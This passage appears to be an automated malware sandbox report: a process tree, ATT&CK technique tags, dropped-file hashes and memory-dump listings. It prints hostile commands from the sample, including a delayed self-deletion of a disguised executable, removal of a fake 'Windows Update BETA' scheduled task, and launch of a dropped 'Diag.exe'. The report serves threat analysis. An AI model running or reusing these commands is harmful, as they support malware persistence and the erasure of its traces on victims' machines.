  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\Msmpeges.exe"
  2⤵
  PID:5708
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:784
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Update BETA" /F
  2⤵
  PID:1724
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS.exe /Delete /TN "Windows Update BETA" /F
    3⤵
    PID:4100
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Diag.exe"
  2⤵
  PID:1348
- - C:\ProgramData\Diag.exe
    C:\ProgramData\Diag.exe
    3⤵
    - Executes dropped EXE
    PID:3652

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5348

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Black_Recover.txt

Filesize
554B

MD5
87ca8cea5510cfcb42e6674d7aa9ef59

SHA1
ef5dd9f0663e769654816e361344133f7d480300

SHA256
da777873d645fec9054e02b37c6e156e779e778ef6a5dd27b4a05a40f68b021d

SHA512
690c49d82649bb9356f986b903efb17a6998f94f53273876e4da3b621fd2c7c6e32c50f318e86cb7e8d96b24fd953a20d410deb71905d96cb719660931abd800

Download Submit
C:\ProgramData\Diag.exe

Filesize
6KB

MD5
39728325879572ffe56a194319f2731f

SHA1
3898a219352dd3aedc54ff924b01317107c9ce2f

SHA256
8e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761

SHA512
7d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b

Download Submit
C:\ProgramData\Diag.exe

Filesize
6KB

MD5
39728325879572ffe56a194319f2731f

SHA1
3898a219352dd3aedc54ff924b01317107c9ce2f

SHA256
8e3ff1907d973d91167c2d74ac8414496d7f430687eef52e3201721e01513761

SHA512
7d80af3e2df1c02bfda76e5ada4b4ce25921418cfcd7f26434293e746968f4187f6c9cf5bbb1c7c4703117eaabdd958700f7b1cefcfa44bd11afe95ad7f1599b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
12a14ecbc6f9fa22aae62e7d63287131

SHA1
2c06cb52d50e8c4a5b470665d6de9a8397ceeec6

SHA256
a4749da20c475114ae98b3aa4f12e57691ff903ff5a5ed60628f1199ca41d5de

SHA512
26b3e1b11a171f3e62f56190dd18d12c5300a96666e28263d4ec51bda5e6855b6289df8e604e8e59cab47e30755b87f9544c2cb2be3d994e4e1271518e055bd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
1912b0a62fe180f498228cc833d69ad7

SHA1
a9805c56e5b056dfbe1e8f0edadd54a6cea89ee8

SHA256
0b7ae94956b911f68144a328d439be5ad321c9135286e16918795cf9f88ca2d2

SHA512
590aed707dd10bbcc33cb8893382a862d2c81877aba1bdfd0c55d8d9fdc8d8549a08645104f7f13b0396ffca19247bb40c1184de7204bc22533aa42b65d54e30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
66030de548ef4e044c36bafa8e2234c8

SHA1
d459bbcc801a6db3e32fc3e19ffcbbc4b8650e8e

SHA256
33bcb36c139e2674d52afe681f522239eba06f226f5c867211c0aa9bb165056e

SHA512
54aeadfb7de3b7940275bc753eec68b1dced6edb524559737912e5e9ab0b16221bbaf3c745210f98f8f0954fcca451c9df1d106f4b75fd0b1cb3a57d6a1aaa5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
80db39cdb31d4aa8624566be40c5f086

SHA1
549cc4dc05deb4ea655634e4163184ad1efc1686

SHA256
c858befbcc762761186576d886202768d929298b51f14dc0b9c69a51ec25d331

SHA512
a91ee4444b62a786f9dceb4e08f5ec7dbc1e65e64b73bcd3e3c466e1ca5d1363823ea20e51f5aef9436ff21a7dc56a14b0c57a82aa4615c8658ba173a842fa0e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
12a14ecbc6f9fa22aae62e7d63287131

SHA1
2c06cb52d50e8c4a5b470665d6de9a8397ceeec6

SHA256
a4749da20c475114ae98b3aa4f12e57691ff903ff5a5ed60628f1199ca41d5de

SHA512
26b3e1b11a171f3e62f56190dd18d12c5300a96666e28263d4ec51bda5e6855b6289df8e604e8e59cab47e30755b87f9544c2cb2be3d994e4e1271518e055bd9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
14KB

MD5
25d4eeb46cb28783166aa4c38c0b5dee

SHA1
8800345b98c497353c66d50e71286fbd7b6f91bf

SHA256
4c9c0ffe8280c9f29d3881f6bfff3337a7b6b319f58051900039f2bd056f6fcc

SHA512
80456e5227e7b64719800ed0e53e277a46ebd6c00145736075d1c5725ad3cc94a784a035004c4f9c7526e07012baee08de6efef101f3529734ca027eb3beba5d

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
14KB

MD5
e15c211df02bd63e9ca194eca6bdd1fe

SHA1
dcd3ff2d3bfafe0d56ed38c3554a67bdc1a97ca8

SHA256
8ba3ae94a9606d9e430b6cd7efc783ac6f4f40ff72e332e946371c74aab75d9f

SHA512
a3ab48aada7ce29168609347aeb5acbb8e7bb0a27ee48e0d67c468df7bba79375f273281a690e7c17f4aab0fd57b89095b2161bac027ba630327a68f2c1af8f4

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

Filesize
14KB

MD5
e15c211df02bd63e9ca194eca6bdd1fe

SHA1
dcd3ff2d3bfafe0d56ed38c3554a67bdc1a97ca8

SHA256
8ba3ae94a9606d9e430b6cd7efc783ac6f4f40ff72e332e946371c74aab75d9f

SHA512
a3ab48aada7ce29168609347aeb5acbb8e7bb0a27ee48e0d67c468df7bba79375f273281a690e7c17f4aab0fd57b89095b2161bac027ba630327a68f2c1af8f4

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin

Filesize
10KB

MD5
d426119aac4a327a89a7d255ac23cf35

SHA1
0a8356dc1f3aa545e533b34a843f80b465ceee69

SHA256
1e90f5afaeec3930a08e9395f0a376018be0865b0eab6affdb0d4072e3d45368

SHA512
71caa2523a795a29884a7bef7d040b7c4cc4324692c3ae803648371b307d0af62fa7df7e7183f868eaa8eb499d6d63d596df75c48a0dfb567196767ccac8a229

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mui53tiw.hmy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-4176143399-3250363947-192774652-1000\desktop.ini

Filesize
129B

MD5
a526b9e7c716b3489d8cc062fbce4005

SHA1
2df502a944ff721241be20a9e449d2acd07e0312

SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

Download Submit
memory/2276-11398-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/2276-11399-0x0000000003130000-0x0000000003140000-memory.dmp

Filesize
64KB

Download
memory/2276-11406-0x0000000003130000-0x0000000003140000-memory.dmp

Filesize
64KB

Download
memory/2440-4275-0x0000000006070000-0x000000000607A000-memory.dmp

Filesize
40KB

Download
memory/2440-3587-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/2440-137-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2440-2898-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2440-136-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/2440-4519-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2440-5274-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/2440-2903-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2440-133-0x0000000002760000-0x0000000002796000-memory.dmp

Filesize
216KB

Download
memory/2440-4005-0x0000000007080000-0x000000000709A000-memory.dmp

Filesize
104KB

Download
memory/2440-3524-0x000000007F7A0000-0x000000007F7B0000-memory.dmp

Filesize
64KB

Download
memory/2440-3541-0x0000000006330000-0x0000000006362000-memory.dmp

Filesize
200KB

Download
memory/2440-142-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2440-2897-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/2440-3992-0x00000000076A0000-0x0000000007D1A000-memory.dmp

Filesize
6.5MB

Download
memory/2440-144-0x0000000004C90000-0x0000000004CB2000-memory.dmp

Filesize
136KB

Download
memory/2440-2618-0x0000000002870000-0x0000000002880000-memory.dmp

Filesize
64KB

Download
memory/2832-11396-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/2832-11439-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/3528-11397-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/3528-11437-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/3528-11440-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/3528-11441-0x0000000001430000-0x0000000001440000-memory.dmp

Filesize
64KB

Download
memory/4308-139-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-3585-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/4308-5101-0x0000000007FE0000-0x0000000007FFA000-memory.dmp

Filesize
104KB

Download
memory/4308-5137-0x0000000007F30000-0x0000000007F38000-memory.dmp

Filesize
32KB

Download
memory/4308-4796-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-2901-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-5257-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4308-2900-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-459-0x0000000006980000-0x000000000699E000-memory.dmp

Filesize
120KB

Download
memory/4308-4475-0x0000000007F40000-0x0000000007FD6000-memory.dmp

Filesize
600KB

Download
memory/4308-155-0x0000000006590000-0x00000000065F6000-memory.dmp

Filesize
408KB

Download
memory/4308-145-0x00000000062A0000-0x0000000006306000-memory.dmp

Filesize
408KB

Download
memory/4308-2904-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-143-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4308-2905-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4308-135-0x0000000005C00000-0x0000000006228000-memory.dmp

Filesize
6.2MB

Download
memory/4308-3560-0x000000007F8C0000-0x000000007F8D0000-memory.dmp

Filesize
64KB

Download
memory/4308-140-0x00000000055C0000-0x00000000055D0000-memory.dmp

Filesize
64KB

Download
memory/4308-5013-0x0000000007EE0000-0x0000000007EEE000-memory.dmp

Filesize
56KB

Download
memory/4596-141-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/4596-138-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/4596-134-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4596-2899-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/4596-2462-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4596-5255-0x0000000073DF0000-0x00000000745A0000-memory.dmp

Filesize
7.7MB

Download
memory/4596-3582-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/4596-2902-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/4596-3605-0x0000000006CC0000-0x0000000006CDE000-memory.dmp

Filesize
120KB

Download
memory/4596-3591-0x000000007EE90000-0x000000007EEA0000-memory.dmp

Filesize
64KB

Download
memory/4836-11424-0x0000000002A80000-0x0000000002A90000-memory.dmp

Filesize
64KB

Download
memory/4836-11427-0x0000000074D20000-0x0000000074D6C000-memory.dmp

Filesize
304KB

Download
memory/4836-11438-0x0000000002A80000-0x0000000002A90000-memory.dmp

Filesize
64KB

Download
memory/4836-11426-0x000000007FA10000-0x000000007FA20000-memory.dmp

Filesize
64KB

Download
memory/4836-11425-0x0000000002A80000-0x0000000002A90000-memory.dmp

Filesize
64KB

Download
memory/4836-11423-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/4836-11382-0x0000000073E80000-0x0000000074630000-memory.dmp

Filesize
7.7MB

Download
memory/4836-11384-0x0000000002A80000-0x0000000002A90000-memory.dmp

Filesize
64KB

Download
memory/4836-11383-0x0000000002A80000-0x0000000002A90000-memory.dmp

Filesize
64KB

Download